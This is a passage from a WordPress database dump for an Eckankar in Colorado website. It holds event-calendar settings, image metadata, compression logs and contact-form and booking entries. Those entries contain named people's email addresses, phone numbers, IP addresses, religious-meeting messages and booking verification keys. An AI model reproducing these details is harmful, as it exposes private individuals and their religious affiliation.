14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(175560,267730,'mec_event_status','EventScheduled'),(175561,267730,'mec_moved_online_link',''),(175562,267730,'mec_cancelled_reason',''),(175563,267730,'mec_display_cancellation_reason_in_single_page',''),(175564,267730,'protect_children',''),(175565,267730,'passster_activate_global_protection',NULL),(175566,267730,'passster_activate_protection',NULL),(175567,267730,'passster_protection_type','password'),(175568,267730,'boldgrid_hide_page_title','0'),(175569,267730,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(175570,267730,'boldgrid_in_page_containers','1'),(175574,267730,'_dp_original','266540'),(175572,267730,'_thumbnail_id','267731'),(175573,267730,'_wp_old_date','2022-04-30'),(175575,267730,'_edit_lock','1673813394:2'),(175576,267730,'_edit_last','2'),(175577,267731,'_wp_attached_file','2023/01/child-stairway-1.jpg'),(175578,267731,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:753;s:6:\"height\";i:425;s:4:\"file\";s:28:\"2023/01/child-stairway-1.jpg\";s:8:\"filesize\";i:36629;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8005;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4660;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12626;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18686;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13825;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"child-stairway-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13493;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(175579,267708,'original-file','2023/01/waterfall-with-text-updraft-pre-smush-original.jpg'),(175580,267708,'smush-complete','1'),(175581,267708,'smush-info','The file was compressed from 128.17 KB to 121.38 KB saving 5.3 percent using WP-Optimize'),(175582,267708,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:131245;s:12:\"smushed-size\";i:124290;s:15:\"savings-percent\";d:5.3;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:131245;s:10:\"compressed\";i:124290;}s:6:\"medium\";a:2:{s:8:\"original\";i:20971;s:10:\"compressed\";i:20477;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9874;s:10:\"compressed\";i:9874;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:106929;s:10:\"compressed\";i:103800;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:32916;s:10:\"compressed\";i:32050;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:54440;s:10:\"compressed\";i:52829;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:38114;s:10:\"compressed\";i:37037;}s:8:\"tileview\";a:2:{s:8:\"original\";i:39421;s:10:\"compressed\";i:38466;}}}'),(175583,267731,'original-file','2023/01/child-stairway-1-updraft-pre-smush-original.jpg'),(175584,267731,'smush-complete','1'),(175585,267731,'smush-info','The file was compressed from 35.77 KB to 34.41 KB saving 3.79 percent using WP-Optimize'),(175586,267731,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36629;s:12:\"smushed-size\";i:35240;s:15:\"savings-percent\";d:3.79;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:36629;s:10:\"compressed\";i:35240;}s:6:\"medium\";a:2:{s:8:\"original\";i:8005;s:10:\"compressed\";i:7939;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4660;s:10:\"compressed\";i:4594;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:12626;s:10:\"compressed\";i:12626;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:18686;s:10:\"compressed\";i:18686;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13825;s:10:\"compressed\";i:13825;}s:8:\"tileview\";a:2:{s:8:\"original\";i:13493;s:10:\"compressed\";i:13493;}}}'),(175587,267733,'protect_children',''),(175588,267733,'mec_color',''),(175589,267733,'mec_location_id','171'),(175590,267733,'mec_dont_show_map','0'),(175591,267733,'mec_organizer_id','1'),(175592,267733,'mec_read_more',''),(175593,267733,'mec_more_info',''),(175594,267733,'mec_more_info_title',''),(175595,267733,'mec_more_info_target','_self'),(175596,267733,'mec_cost',''),(175597,267733,'mec_currency','a:0:{}'),(175598,267733,'mec_additional_organizer_ids','a:0:{}'),(175599,267733,'mec_additional_location_ids','a:0:{}'),(175600,267733,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-16\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175601,267733,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175602,267733,'mec_certain_weekdays','a:0:{}'),(175603,267733,'mec_allday','0'),(175604,267733,'one_occurrence','0'),(175605,267733,'mec_hide_time','0'),(175606,267733,'mec_hide_end_time','0'),(175607,267733,'mec_comment',''),(175608,267733,'mec_timezone','global'),(175609,267733,'mec_countdown_method','global'),(175610,267733,'mec_public','1'),(175611,267733,'mec_start_date','2023-02-16'),(175612,267733,'mec_start_time_hour','7'),(175613,267733,'mec_start_time_minutes','0'),(175614,267733,'mec_start_time_ampm','PM'),(175615,267733,'mec_start_day_seconds','68400'),(175616,267733,'mec_end_date','2023-02-16'),(175617,267733,'mec_end_time_hour','8'),(175618,267733,'mec_end_time_minutes','0'),(175619,267733,'mec_end_time_ampm','PM'),(175620,267733,'mec_end_day_seconds','72000'),(175621,267733,'mec_repeat_status','0'),(175622,267733,'mec_repeat_type',''),(175623,267733,'mec_repeat_interval','1'),(175624,267733,'mec_repeat_end',''),(175625,267733,'mec_repeat_end_at_occurrences',''),(175626,267733,'mec_repeat_end_at_date',''),(175627,267733,'mec_advanced_days','a:0:{}'),(175628,267733,'mec_in_days',''),(175629,267733,'mec_not_in_days',''),(175630,267733,'mec_hourly_schedules','a:0:{}'),(175631,267733,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175632,267733,'mec_tickets','a:0:{}'),(175633,267733,'mec_fees_global_inheritance','1'),(175634,267733,'mec_fees','a:0:{}'),(175635,267733,'mec_ticket_variations_global_inheritance','1'),(175636,267733,'mec_ticket_variations','a:0:{}'),(175637,267733,'mec_reg_fields_global_inheritance','1'),(175638,267733,'mec_reg_fields','a:0:{}'),(175639,267733,'mec_bfixed_fields','a:0:{}'),(175640,267733,'mec_op','a:0:{}'),(175641,267733,'mec_fields','a:0:{}'),(175642,267733,'mec_event_status','EventScheduled'),(175643,267733,'mec_moved_online_link',''),(175644,267733,'mec_cancelled_reason',''),(175645,267733,'mec_display_cancellation_reason_in_single_page',''),(175646,267733,'boldgrid_hide_page_title','0'),(175647,267733,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175648,267733,'passster_activate_global_protection',NULL),(175649,267733,'passster_activate_protection',NULL),(175650,267733,'passster_protection_type','password'),(175651,267733,'boldgrid_in_page_containers','1'),(175652,267733,'_dp_original','265240'),(175653,267733,'_edit_lock','1673815755:2'),(175654,267733,'_edit_last','2'),(175655,267734,'_wp_attached_file','2023/01/heart-in-hand-zoom.jpg'),(175656,267734,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:735;s:6:\"height\";i:419;s:4:\"file\";s:30:\"2023/01/heart-in-hand-zoom.jpg\";s:8:\"filesize\";i:37765;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5105;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13949;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19305;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14262;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"heart-in-hand-zoom-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17216;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(175657,267733,'_thumbnail_id','267734'),(175658,267736,'_field_362','Sherry'),(175659,267736,'_field_363','YOST'),(175660,267736,'_field_370','13233778013'),(175661,267736,'_field_364','2sherryyost@gmail.com'),(175662,267736,'_field_365','Meetings on the 22nd Jan '),(175663,267736,'_field_366','I\'m an ECKist in Utah and I\'ll be visiting Cortez occasionally and was told there\'s a meeting on Sunday\'s 1-3.\n\nI\'ll be in Durango Sunday morning for another meeting that will done before that. \n\nWhat\'s scheduled for next Sunday January 23rd and an address. \n\nFeel free to call me. \n\nBB, \nSherry Yost '),(175664,267736,'_form_id','39'),(175665,267736,'_seq_num','6'),(175666,267737,'_field_224','Theresa'),(175667,267737,'_field_225','Gress'),(175668,267737,'_field_226','teri.gress@gmail.com'),(175669,267737,'_field_227','PA'),(175670,267737,'_field_228','US'),(175671,267737,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(175672,267737,'_form_id','21'),(175673,267737,'_seq_num','163'),(175674,267739,'mec_transaction_id','JET55973'),(175675,267739,'mec_user_id','1000015'),(175676,267739,'mec_verified','1'),(175677,267739,'mec_verification_key','0798f6a5e75fa88c55e87b3f0a45d508'),(175678,267739,'mec_cancellation_key','fbe844756d8420f511d4a5b00666d424'),(175679,267739,'mec_confirmed','1'),(175680,267739,'mec_event_id','267433'),(175681,267739,'mec_date','1674387900:1674392400'),(175682,267739,'mec_ticket_id',',1,'),(175683,267739,'mec_booking_time','2023-01-20 19:08:37'),(175684,267739,'mec_all_dates','a:0:{}'),(175685,267739,'mec_other_dates','a:0:{}'),(175686,267739,'mec_attention_time','1674387900:1674392400'),(175687,267739,'mec_attention_time_start','1674387900'),(175688,267739,'mec_attention_time_end','1674392400'),(175689,267739,'mec_book_date_submit','20230120190837'),(175690,267739,'mec_booking_location','129'),(175691,267739,'mec_ticket_price_1','0'),(175692,267739,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"68.114.225.123\";}}'),(175693,267739,'mec_price','0'),(175694,267739,'mec_gateway','MEC_gateway_free'),(175695,267739,'mec_gateway_label','Free'),(175696,267740,'_field_224','Cathy'),(175697,267740,'_field_225','Pack'),(175698,267740,'_field_226','cathypack.dance@gmail.com'),(175699,267740,'_field_227','CO'),(175700,267740,'_field_228','US'),(175701,267740,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(175702,267740,'_form_id','21'),(175703,267740,'_seq_num','164'),(175704,267741,'mec_transaction_id','ZAJ99074'),(175705,267741,'mec_user_id','1000057'),(175706,267741,'mec_verified','1'),(175707,267741,'mec_verification_key','253c300ffc67e9d0dd9eaafccd1aeaf3'),(175708,267741,'mec_cancellation_key','bd6ac3bb84f39859f01fd09601afad43'),(175709,267741,'mec_confirmed','1'),(175710,267741,'mec_event_id','267570'),(175711,267741,'mec_date','1674383400:1674387000'),(175712,267741,'mec_ticket_id',',1,'),(175713,267741,'mec_booking_time','2023-01-21 08:56:45'),(175714,267741,'mec_all_dates','a:0:{}'),(175715,267741,'mec_other_dates','a:0:{}'),(175716,267741,'mec_attention_time','1674383400:1674387000'),(175717,267741,'mec_attention_time_start','1674383400'),(175718,267741,'mec_attention_time_end','1674387000'),(175719,267741,'mec_book_date_submit','20230121085645'),(175720,267741,'mec_booking_location','118'),(175721,267741,'mec_ticket_price_1','0'),(175722,267741,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"104.8.20.168\";}}'),(175723,267741,'mec_price','0'),(175724,267741,'mec_gateway','MEC_gateway_free'),(175725,267741,'mec_gateway_label','Free'),(175726,267742,'mec_transaction_id','ENK36819'),(175727,267742,'mec_user_id','1000065'),(175728,267742,'mec_verified','1'),(175729,267742,'mec_verification_key','9b67de58b56e9a1bd2a316252a337c32'),(175730,267742,'mec_cancellation_key','872975a6c641422485185661f5ecfdc7'),(175731,267742,'mec_confirmed','1'),(175732,267742,'mec_event_id','267570'),(175733,267742,'mec_date','1674383400:1674387000'),(175734,267742,'mec_ticket_id',',1,'),(175735,267742,'mec_booking_time','2023-01-22 01:48:21'),(175736,267742,'mec_all_dates','a:0:{}'),(175737,267742,'mec_other_dates','a:0:{}'),(175738,267742,'mec_attention_time','1674383400:1674387000'),(175739,267742,'mec_attention_time_start','1674383400'),(175740,267742,'mec_attention_time_end','1674387000'),(175741,267742,'mec_book_date_submit','20230122014821'),(175742,267742,'mec_booking_location','118'),(175743,267742,'mec_ticket_price_1','0'),(175744,267742,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:15:\"Lisa1lg@aol.com\";s:4:\"name\";s:9:\"Lisa Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.237.102.179\";}}'),(175745,267742,'mec_price','0'),(175746,267742,'mec_gateway','MEC_gateway_free'),(175747,267742,'mec_gateway_label','Free'),(175748,267743,'mec_transaction_id','OUJ15457'),(175749,267743,'mec_user_id','1000066'),(175750,267743,'mec_verified','1'),(175751,267743,'mec_verification_key','d63a46b8aeb060e3995f188dfaec69df'),(175752,267743,'mec_cancellation_key','14b874c1b128e6febff04bf48cf56207'),(175753,267743,'mec_confirmed','1'),(175754,267743,'mec_event_id','267570'),(175755,267743,'mec_date','1674383400:1674387000'),(175756,267743,'mec_ticket_id',',1,'),(175757,267743,'mec_booking_time','2023-01-22 01:53:05'),(175758,267743,'mec_all_dates','a:0:{}'),(175759,267743,'mec_other_dates','a:0:{}'),(175760,267743,'mec_attention_time','1674383400:1674387000'),(175761,267743,'mec_attention_time_start','1674383400'),(175762,267743,'mec_attention_time_end','1674387000'),(175763,267743,'mec_book_date_submit','20230122015305'),(175764,267743,'mec_booking_location','118'),(175765,267743,'mec_ticket_price_1','0'),(175766,267743,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"christo990@aol.com\";s:4:\"name\";s:10:\"Chris Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.237.102.179\";}}'),(175767,267743,'mec_price','0'),(175768,267743,'mec_gateway','MEC_gateway_free'),(175769,267743,'mec_gateway_label','Free'),(175770,267744,'_field_224','Marcela'),(175771,267744,'_field_225','Cox'),(175772,267744,'_field_226','marcelittagc@gmail.com'),(175773,267744,'_field_227','CO'),(175774,267744,'_field_228','US'),(175775,267744,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(175776,267744,'_form_id','21'),(175777,267744,'_seq_num','165'),(175778,267745,'mec_transaction_id','RCZ50342'),(175779,267745,'mec_user_id','1000062'),(175780,267745,'mec_verified','1'),(175781,267745,'mec_verification_key','f46c1755bb6c7a70f1fd0db30616458f'),(175782,267745,'mec_cancellation_key','5fc7f855ab796acc64eae888a1765f8c'),(175783,267745,'mec_confirmed','1'),(175784,267745,'mec_event_id','267570'),(175785,267745,'mec_date','1674383400:1674387000'),(175786,267745,'mec_ticket_id',',1,'),(175787,267745,'mec_booking_time','2023-01-22 10:24:45'),(175788,267745,'mec_all_dates','a:0:{}'),(175789,267745,'mec_other_dates','a:0:{}'),(175790,267745,'mec_attention_time','1674383400:1674387000'),(175791,267745,'mec_attention_time_start','1674383400'),(175792,267745,'mec_attention_time_end','1674387000'),(175793,267745,'mec_book_date_submit','20230122102445'),(175794,267745,'mec_booking_location','118'),(175795,267745,'mec_ticket_price_1','0'),(175796,267745,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:10:\"24.8.68.74\";}}'),(175797,267745,'mec_price','0'),(175798,267745,'mec_gateway','MEC_gateway_free'),(175799,267745,'mec_gateway_label','Free'),(175801,267746,'_field_134','Testing'),(175802,267746,'_field_135','choll.03@comcast.net'),(175803,267746,'_field_137','This is a test'),(175804,267746,'_field_138','This is some test text.....'),(175805,267746,'_form_id','13'),(175806,267746,'_seq_num','127'),(175807,267747,'_field_133','Test2'),(175808,267747,'_field_134','Testing2'),(175809,267747,'_field_135','choll.03@comcast.net'),(175810,267747,'_field_137','Testing 2'),(175811,267747,'_field_138','djadsa\'dga44adg\najdgljalgjal'),(175812,267747,'_form_id','13'),(175813,267747,'_seq_num','128'),(175814,267748,'_field_133','Test3'),(175815,267748,'_field_134','Testing 3'),(175816,267748,'_field_135','choll.03@comcast.net'),(175817,267748,'_field_137','Test 3'),(175818,267748,'_field_138','dasasdgaa\nag\nad\ng\ndfgdafdsfhfdjg;sfdlh'),(175819,267748,'_form_id','13'),(175820,267748,'_seq_num','129'),(175821,267570,'_oembed_ba0233ca4449f2f4d221d2ae6713eca4','{{unknown}}'),(177922,268095,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:38:\"HI-Conf-Overview-FINAL-2-14-23-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251086;}s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"HI-Conf-Overview-FINAL-2-14-23-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20201;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"HI-Conf-Overview-FINAL-2-14-23-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145338;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"HI-Conf-Overview-FINAL-2-14-23-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7925;}}s:8:\"filesize\";i:373613;}'),(177921,268095,'_wp_attached_file','2023/02/HI-Conf-Overview-FINAL-2-14-23.pdf'),(177920,7160,'passster_area_shortcode',''),(177919,268087,'_seq_num','25'),(177918,268087,'_form_id','10'),(177916,268087,'_field_104','Spiritual Services Director'),(177917,268087,'_field_105','Hi, I\'m an HI from Pennsylvania.  I am contemplating attending your HI Retreat in April.  I found the registration form on your website but I haven\'t found any additional information about the seminar.  Is there a seminar hotel?  If not, could you send me some info on hotels near the Temple where I could make reservations?  Any info you can provide will be a big help in planning my travel.\n\nThank you in ECK\nNick'),(177915,268087,'_field_101','Other'),(177914,268087,'_field_100','(484) 553-8171'),(177912,268087,'_field_98','Sorrentino'),(177913,268087,'_field_99','nicks39@gmail.com'),(177925,268077,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/02/2023-HI-overview-registration.pdf - cannot be optimized, it has an invalid file type'),(177924,268095,'smush-complete',''),(177923,268095,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/02/HI-Conf-Overview-FINAL-2-14-23.pdf - cannot be optimized, it has an invalid file type'),(191460,269012,'smush-complete','1'),(177965,268113,'mec_user_id','1000069'),(177966,268113,'mec_verified','1'),(177967,268113,'mec_verification_key','40c7509dc82f16c28a1aa5fc957d24e6'),(177968,268113,'mec_cancellation_key','967807e2799c2d628f398447b9365638'),(177969,268113,'mec_confirmed','1'),(177970,268113,'mec_event_id','268025'),(177971,268113,'mec_date','1678012200:1678059000'),(177972,268113,'mec_ticket_id',',1,'),(177973,268113,'mec_booking_time','2023-02-27 10:05:54'),(177974,268113,'mec_all_dates','a:0:{}'),(177975,268113,'mec_other_dates','a:0:{}'),(177976,268113,'mec_attention_time','1678012200:1678059000'),(177977,268113,'mec_attention_time_start','1678012200'),(177978,268113,'mec_attention_time_end','1678059000'),(177979,268113,'mec_book_date_submit','20230227100554'),(177980,268113,'mec_booking_location','118'),(191775,269101,'_field_653','travelers2@comcast.net'),(191446,269010,'_edit_last','2'),(191444,269010,'_dp_original','267012'),(191445,269010,'_edit_lock','1698160784:2'),(177949,268103,'smush-complete','1'),(177950,268103,'smush-info','The file was compressed from 154.82 KB to 49.02 KB saving 68.34 percent using WP-Optimize'),(180834,268282,'mec_color',''),(180833,268282,'_thumbnail_id','266470'),(177948,268103,'original-file','2023/02/cropped-favicon-gold-lg-updraft-pre-smush-original.png'),(177952,268102,'original-file','2023/02/favicon-gold-lg-updraft-pre-smush-original.png'),(177953,268102,'smush-complete','1'),(177954,268102,'smush-info','The file was compressed from 179.56 KB to 49.04 KB saving 72.69 percent using WP-Optimize'),(177955,268102,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:183872;s:12:\"smushed-size\";i:50221;s:15:\"savings-percent\";d:72.69;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:183872;s:10:\"compressed\";i:50221;}s:6:\"medium\";a:2:{s:8:\"original\";i:66483;s:10:\"compressed\";i:22634;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:23418;s:10:\"compressed\";i:8625;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:105830;s:10:\"compressed\";i:34681;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:76273;s:10:\"compressed\";i:25508;}s:8:\"tileview\";a:2:{s:8:\"original\";i:90565;s:10:\"compressed\";i:30520;}}}'),(177943,268103,'_wp_attached_file','2023/02/cropped-favicon-gold-lg.png'),(177944,268103,'_wp_attachment_context','site-icon'),(177945,268103,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:35:\"2023/02/cropped-favicon-gold-lg.png\";s:8:\"filesize\";i:158538;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66483;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23418;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66483;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105830;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76273;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s